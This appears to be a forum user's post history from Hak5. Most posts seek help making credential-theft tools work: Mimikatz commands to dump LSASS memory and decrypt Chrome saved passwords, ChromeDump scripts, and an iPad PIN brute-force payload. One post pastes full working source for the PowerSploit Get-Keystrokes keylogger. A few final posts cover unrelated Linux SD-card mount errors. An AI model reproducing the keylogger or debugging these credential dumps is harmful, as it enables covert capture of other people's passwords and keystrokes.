
eeeeeesy


  1. I also tried Nishang's mimikatz with the command

         Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

     But I get this error about /unprotect, so it's not decrypting the login data from Chrome.

         Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
         At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1
         + Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...

     Could you tell me what I'm doing wrong?
  2. Is there a working Get-ChromeDump.ps1 or Get-SessionCookieDump.ps1 or Nishang's Get-WebCredentials.ps1? Or do you know how to get the Empire version of ChromeDump.ps1 to work? When I run the Empire version, it dumps the search history fine, but when it dumps the username and password the password does not show up; just the username and search history show up. I also get an error when running Get-ChromeDump.ps1. Here is the error when running Get-ChromeDump.ps1:

         Exception calling "Unprotect" with "3" argument(s): "The parameter is incorrect. "
         At line:153 char:9
         + $decryptedBytes = [Security.Cryptography.ProtectedData]::Unpr ...
         + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
         + FullyQualifiedErrorId : CryptographicException

         Exception calling "GetString" with "1" argument(s): "Array cannot be null. Parameter name: bytes"
         At line:154 char:9
         + $plaintext = [System.Text.Encoding]::ASCII.GetString($decrypt ...
         + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
         + FullyQualifiedErrorId : ArgumentNullException
  3. @Darren Kitchen is there a payload for bruteforcing old iPad PINs? And do you have the link? Also would need to know what Ducky firmware to use for that. I'm thinking Twin Duck c_duck 2.0 firmware.
  4. How can I do all that though? It might take a while to post all that on here, so can you come on irc.hak5.org #hak5 and help me when you have time please?
  5. @PoSHMagiC0de I'm just trying to use it to dump passwords from memory. Any idea how I do that?
  6. @PoSHMagiC0de OK, so I got the BC Security Empire Invoke-Mimikatz 11-25th update just now and I still have the same error 0x2, which means the .dmp file is not found, even when running as administrator and bypassing UAC. I've done a search on my entire C drive for lsass.dmp and can't find it because the .dmp file is never created. Can you please post a link directly to the Invoke-Mimikatz.ps1 that I should try? Maybe I still have the wrong one.

         Invoke-Mimikatz -Command '"log %TEMP%\mimikatz.log" "privilege::debug" "sekurlsa::minidump %TEMP%\lsass.dmp" "sekurlsa::tspkg"'

     mimikatz log:

         mimikatz(powershell) # log %TEMP%\mimikatz.log
         Using 'C:\Users\user4\AppData\Local\Temp\mimikatz.log' for logfile : OK

         mimikatz(powershell) # privilege::debug
         Privilege '20' OK

         mimikatz(powershell) # sekurlsa::minidump %TEMP%\lsass.dmp
         Switch to MINIDUMP : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp'

         mimikatz(powershell) # sekurlsa::tspkg %TEMP%\lsass.dmp
         Opening : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp' file for minidump...
         ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
  7. So do you have this totally decoded invoke-mimikatz script that I can check the save path of the .dmp file?
  8. @PoSHMagiC0de Thank you for your response. I managed to get this PowerShell script working with this command as administrator:

         Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::tspkg"'

     I read that minidump still works instead of the LSA permission method. Now the only error I get is error 0x2, which is a file not found error because tspkg can't find the .dmp file. I can't find minidump in the script to see if the proper code is there to create the .dmp file or what path the .dmp file might be saving to, and I believe the minidump code might be in the encoded base64 string, which I do not know how to decode. Is it possible for you to post a completely decoded version of Invoke-Mimikatz.ps1? I like the default PowerShell script because I do not want to install .NET Framework to run it. I really want to get this script working, if that's possible, to edit the save path of the .dmp file. Here is the command to run Invoke-Mimikatz along with successful minidump and error 0x2 on tspkg: https://pastebin.com/kFTsp2Zk
  9. @PoSHMagiC0de Compared to the rest, this script actually runs. Thank you, but I'm having a small problem. My issue is that I get a memory error and it exits. But at least it's not a code error. Can you tell me what I'm doing wrong? Here is the error.

           .#####.   mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil!
          .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
          ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
          ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
          '## v ##'       Vincent LE TOUX ( vincent.letoux@gmail.com )
           '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

         mimikatz(powershell) # sekurlsa::logonpasswords
         ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

         mimikatz(powershell) # exit
         Bye!
  10. function Get-Keystrokes { <# .SYNOPSIS Logs keys pressed, time and the active window. PowerSploit Function: Get-Keystrokes Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .PARAMETER LogPath Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. .PARAMETER CollectionInterval Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. .PARAMETER PollingInterval Specifies the time in milliseconds to wait between calls to GetAsyncKeyState. Defaults to 40 milliseconds. .EXAMPLE Get-Keystrokes -LogPath C:\key.log .EXAMPLE Get-Keystrokes -CollectionInterval 20 .EXAMPLE Get-Keystrokes -PollingInterval 35 .LINK http://www.obscuresec.com/ http://www.exploit-monday.com/ #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})] [String] $LogPath = "$($Env:TEMP)\key.log", [Parameter(Position = 1)] [UInt32] $CollectionInterval, [Parameter(Position = 2)] [Int32] $PollingInterval = 40 ) $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) Write-Verbose "Logging keystrokes to $LogPath" $Initilizer = { $LogPath = 'REPLACEME' '"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode function KeyLog { [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null try { $ImportDll = [User32] } catch { $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib') $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False) $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class') $DllImportConstructor = 
[Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) $FieldArray = [Reflection.FieldInfo[]] @( [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'), [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'), [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'), [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'), [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'), [Runtime.InteropServices.DllImportAttribute].GetField('CharSet') ) $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys])) $FieldValueArray = [Object[]] @( 'GetAsyncKeyState', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]])) $FieldValueArray = [Object[]] @( 'GetKeyboardState', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32])) $FieldValueArray = [Object[]] @( 'MapVirtualKey', $False, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = 
$TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32], [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32])) $FieldValueArray = [Object[]] @( 'ToUnicode', $False, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @()) $FieldValueArray = [Object[]] @( 'GetForegroundWindow', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $ImportDll = $TypeBuilder.CreateType() } Start-Sleep -Milliseconds $PollingInterval try { #loop through typeable characters to see which is pressed for ($TypeableChar = 1; $TypeableChar -le 254; $TypeableChar++) { $VirtualKey = $TypeableChar $KeyResult = $ImportDll::GetAsyncKeyState($VirtualKey) #if the key is pressed if (($KeyResult -band 0x8000) -eq 0x8000) { #check for keys not mapped by virtual keyboard $LeftShift = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000 $RightShift = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000 $LeftCtrl = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000 $RightCtrl = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000 $LeftAlt = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000 $RightAlt = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000 $TabKey = 
($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000 $SpaceBar = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000 $DeleteKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000 $EnterKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000 $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000 $LeftArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000 $RightArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000 $UpArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000 $DownArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000 $LeftMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000 $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000 if ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'} if ($LeftCtrl -or $RightCtrl) {$LogOutput += '[Ctrl]'} if ($LeftAlt -or $RightAlt) {$LogOutput += '[Alt]'} if ($TabKey) {$LogOutput += '[Tab]'} if ($SpaceBar) {$LogOutput += '[SpaceBar]'} if ($DeleteKey) {$LogOutput += '[Delete]'} if ($EnterKey) {$LogOutput += '[Enter]'} if ($BackSpaceKey) {$LogOutput += '[Backspace]'} if ($LeftArrow) {$LogOutput += '[Left Arrow]'} if ($RightArrow) {$LogOutput += '[Right Arrow]'} if ($UpArrow) {$LogOutput += '[Up Arrow]'} if ($DownArrow) {$LogOutput += '[Down Arrow]'} if ($LeftMouse) {$LogOutput += '[Left Mouse]'} if ($RightMouse) {$LogOutput += '[Right Mouse]'} #check for capslock if ([Console]::CapsLock) {$LogOutput += '[Caps Lock]'} $MappedKey = $ImportDll::MapVirtualKey($VirtualKey, 3) $KeyboardState = New-Object Byte[] 256 $CheckKeyboardState = $ImportDll::GetKeyboardState($KeyboardState) #create a stringbuilder object $StringBuilder = 
New-Object -TypeName System.Text.StringBuilder; $UnicodeKey = $ImportDll::ToUnicode($VirtualKey, $MappedKey, $KeyboardState, $StringBuilder, $StringBuilder.Capacity, 0) #convert typed characters if ($UnicodeKey -gt 0) { $TypedCharacter = $StringBuilder.ToString() $LogOutput += ('['+ $TypedCharacter +']') } #get the title of the foreground window $TopWindow = $ImportDll::GetForegroundWindow() $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle #get the current DTG $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) #Create a custom object to store results $ObjectProperties = @{'Key Typed' = $LogOutput; 'Time' = $TimeStamp; 'Window Title' = $WindowTitle} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties # Stupid hack since Export-CSV doesn't have an append switch in PSv2 $CSVEntry = ($ResultsObject | ConvertTo-Csv -NoTypeInformation)[1] #return results Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode } } } catch {} } } $Initilizer = [ScriptBlock]::Create(($Initilizer -replace 'REPLACEME', $LogPath)) Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null if ($PSBoundParameters['CollectionInterval']) { $Timer = New-Object Timers.Timer($CollectionInterval * 60 * 1000) Register-ObjectEvent -InputObject $Timer -EventName Elapsed -SourceIdentifier ElapsedAction -Action { Stop-Job -Name Keylogger Unregister-Event -SourceIdentifier ElapsedAction $Sender.Stop() } | Out-Null } } When I run this powershell script using the Get-Keystrokes -LogPath $env:temp\key.log command, I get this error. So then I run the Get-Keystrokes command and get this error So then I run .\Get-Keystrokes and the task goes through, except for the log is never created in the file path. Can some people here please tell me what I'm doing wrong and let me know how to get this working?
  11. Do you think this will work? The Moblin Live Image | moblin.org
  12. Yes, but if I use the name qtparted at the end of my Google search then I might find a post where someone has a similar problem. Right?
  13. I'm doing a Google search to see what I find for "mount: can't find /dev/sdc1/ in /etc/fstab or /etc/mtab qtparted". Maybe it will help. EDIT: I don't want to try creating a new fstab entry because I'm sure a different SD card will work, but I'm not letting 4gb go to waste so easily, so I'll keep looking.
  14. mount point /mountpoint does not exist
  15. mount: can't find /dev/sdc1/ in /etc/fstab or /etc/mtab